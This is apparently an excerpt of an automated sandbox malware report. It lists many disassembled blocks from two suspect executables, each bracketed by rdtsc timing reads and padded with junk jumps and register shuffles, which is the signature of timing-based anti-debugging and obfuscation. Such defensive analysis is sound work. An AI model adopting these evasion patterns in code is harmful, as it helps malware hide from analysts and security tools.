Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC045D second address: 4EC04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F28C475807Eh 0x00000011 and eax, 1AE49F98h 0x00000017 jmp 00007F28C475807Bh 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F28C475807Bh 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F28C4758080h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04C2 second address: 4EC04D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC050F second address: 4EC0515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0616 second address: 4EC0616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov ah, EEh 0x0000000f popad 0x00000010 test al, al 0x00000012 jmp 00007F28C47EE2BBh 0x00000017 jne 00007F28C47EE276h 0x0000001d mov al, byte ptr [edx] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F28C47EE2BDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC064A second address: 4EC064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC064E second address: 4EC06B4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F28C47EE2C0h 0x00000008 and ah, 00000018h 0x0000000b jmp 00007F28C47EE2BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F28C47EE2C8h 0x00000019 sub cx, 6678h 0x0000001e jmp 00007F28C47EE2BBh 0x00000023 popfd 0x00000024 popad 0x00000025 sub edx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F28C47EE2C1h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC06B4 second address: 4EC06BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC06BA second address: 4EC071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e jmp 00007F28C47EE2C2h 0x00000013 dec edi 0x00000014 pushad 0x00000015 mov ax, 434Dh 0x00000019 pushfd 0x0000001a jmp 00007F28C47EE2BAh 0x0000001f add al, 00000068h 0x00000022 jmp 00007F28C47EE2BBh 0x00000027 popfd 0x00000028 popad 0x00000029 lea ebx, dword ptr [edi+01h] 0x0000002c jmp 00007F28C47EE2C6h 0x00000031 mov al, byte ptr [edi+01h] 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC071B second address: 4EC0748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F28C4758089h 0x0000000a push esi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d popad 0x0000000e inc edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx eax, dx 0x00000015 mov ax, di 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0748 second address: 4EC07B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F28C47EE2C0h 0x00000010 jne 00007F29352465CDh 0x00000016 jmp 00007F28C47EE2C0h 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e mov bl, C0h 0x00000020 popad 0x00000021 shr ecx, 02h 0x00000024 jmp 00007F28C47EE2C4h 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f rep movsd 0x00000031 rep movsd 0x00000033 jmp 00007F28C47EE2C0h 0x00000038 mov ecx, edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov cx, 98AFh 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC07B7 second address: 4EC0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 03h 0x0000000c pushad 0x0000000d push eax 0x0000000e mov esi, edi 0x00000010 pop edx 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rep movsb 0x00000017 jmp 00007F28C4758087h 0x0000001c mov dword ptr [ebp-04h], FFFFFFFEh 0x00000023 jmp 00007F28C4758086h 0x00000028 mov eax, ebx 0x0000002a pushad 0x0000002b call 00007F28C475807Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0825 second address: 4EC084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dx, E874h 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp-10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F28C47EE2C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC084A second address: 4EC0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0850 second address: 4EC08AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], ecx 0x00000012 pushad 0x00000013 mov si, BDB3h 0x00000017 pushfd 0x00000018 jmp 00007F28C47EE2C8h 0x0000001d sub cx, 67B8h 0x00000022 jmp 00007F28C47EE2BBh 0x00000027 popfd 0x00000028 popad 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F28C47EE2C0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC08AF second address: 4EC08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC08B5 second address: 4EC0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007F28C47EE2C0h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F28C47EE2BDh 0x00000017 sbb ah, 00000066h 0x0000001a jmp 00007F28C47EE2C1h 0x0000001f popfd 0x00000020 popad 0x00000021 pop ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0904 second address: 4EC0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0908 second address: 4EC050F instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, 76h 0x00000008 popad 0x00000009 leave 0x0000000a pushad 0x0000000b mov esi, 2BF823D9h 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 retn 0008h 0x00000016 cmp dword ptr [ebp-2Ch], 10h 0x0000001a mov eax, dword ptr [ebp-40h] 0x0000001d jnc 00007F28C47EE2B5h 0x0000001f push eax 0x00000020 lea edx, dword ptr [ebp-00000590h] 0x00000026 push edx 0x00000027 call esi 0x00000029 push 00000008h 0x0000002b jmp 00007F28C47EE2BEh 0x00000030 push 3571E133h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0A4A second address: 4EC0B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F28C475807Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 pushfd 0x00000015 jmp 00007F28C4758083h 0x0000001a sbb ah, 0000005Eh 0x0000001d jmp 00007F28C4758089h 0x00000022 popfd 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F28C4758080h 0x0000002a and ax, 8358h 0x0000002f jmp 00007F28C475807Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F28C475807Bh 0x00000040 xor ax, B21Eh 0x00000045 jmp 00007F28C4758089h 0x0000004a popfd 0x0000004b mov eax, 35940FE7h 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B05 second address: 4EC0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C47EE2C3h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F28C47EE2BCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B32 second address: 4EC0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B36 second address: 4EC0B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B3C second address: 4EC0B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, C7h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B43 second address: 4EC0B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B51 second address: 4EC0B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9105D7 second address: 9105FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B6h 0x00000008 jmp 00007F28C47EE2C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90F685 second address: 90F698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90F698 second address: 90F69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FBF0 second address: 90FBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD43 second address: 90FD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD5D second address: 90FD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD63 second address: 90FD8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jng 00007F28C47EE2BEh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD8D second address: 90FD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118B0 second address: 9118BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118BE second address: 9118C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118C2 second address: 9118FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F28C47EE2C3h 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D3C60h] 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D26FDh], eax 0x0000001b call 00007F28C47EE2B9h 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F28C47EE2B8h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118FE second address: 911911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F28C4758076h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911A7C second address: 911B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F28C47EE2BCh 0x00000013 mov dword ptr [ebp+122D1D9Dh], esi 0x00000019 mov edx, 7240FA53h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F28C47EE2B8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jmp 00007F28C47EE2C3h 0x0000003f and edx, 34A2DF00h 0x00000045 call 00007F28C47EE2B9h 0x0000004a push edi 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e push ebx 0x0000004f pop ebx 0x00000050 popad 0x00000051 pop edi 0x00000052 push eax 0x00000053 jmp 00007F28C47EE2C3h 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c push edi 0x0000005d jg 00007F28C47EE2C0h 0x00000063 pop edi 0x00000064 mov eax, dword ptr [eax] 0x00000066 push ecx 0x00000067 push eax 0x00000068 push edx 0x00000069 jne 00007F28C47EE2B6h 0x0000006f rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911B17 second address: 911B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911B32 second address: 911BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, bx 0x0000000a push 00000003h 0x0000000c sub dword ptr [ebp+122D3468h], esi 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D3D3Ch] 0x0000001a push 00000003h 0x0000001c pushad 0x0000001d mov edx, dword ptr [ebp+122D3C2Ch] 0x00000023 popad 0x00000024 mov edi, esi 0x00000026 push AA8D4DAFh 0x0000002b jmp 00007F28C47EE2BAh 0x00000030 add dword ptr [esp], 1572B251h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F28C47EE2B8h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 lea ebx, dword ptr [ebp+12456771h] 0x00000057 adc dh, FFFFFFB9h 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d ja 00007F28C47EE2CFh 0x00000063 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911C69 second address: 911C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911C6F second address: 911C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911C73 second address: 911CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D3CD8h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F28C4758078h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push E2DBF26Bh 0x00000030 jg 00007F28C4758091h 0x00000036 add dword ptr [esp], 1D240E15h 0x0000003d clc 0x0000003e push 00000003h 0x00000040 mov ecx, dword ptr [ebp+122D25F4h] 0x00000046 push 00000000h 0x00000048 or ecx, 644ABFBCh 0x0000004e push 00000003h 0x00000050 xor ecx, dword ptr [ebp+122D3C38h] 0x00000056 push DDAFB23Fh 0x0000005b jbe 00007F28C4758090h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911CFD second address: 911D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 92419A second address: 92419F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 931E62 second address: 931E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C6h 0x0000000a jc 00007F28C47EE2CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 931E85 second address: 931E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758081h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932012 second address: 93202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932168 second address: 93216C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93216C second address: 932172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932172 second address: 932178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932178 second address: 932198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9324A1 second address: 9324A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9324A5 second address: 9324A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932645 second address: 93264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932800 second address: 932804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932C66 second address: 932C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932F2F second address: 932F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F45BE second address: 8F45D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F28C4758076h 0x0000000b jl 00007F28C4758076h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F45D2 second address: 8F45DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F45DC second address: 8F45E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93308D second address: 93309B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93309B second address: 9330A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9330A1 second address: 9330AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F28C47EE2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9330AE second address: 9330B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337B7 second address: 9337BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337BD second address: 9337C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337C2 second address: 9337D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F28C47EE2BFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337D8 second address: 933817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F28C4758091h 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F28C475807Eh 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 933817 second address: 93381D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 933E06 second address: 933E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 939033 second address: 939039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
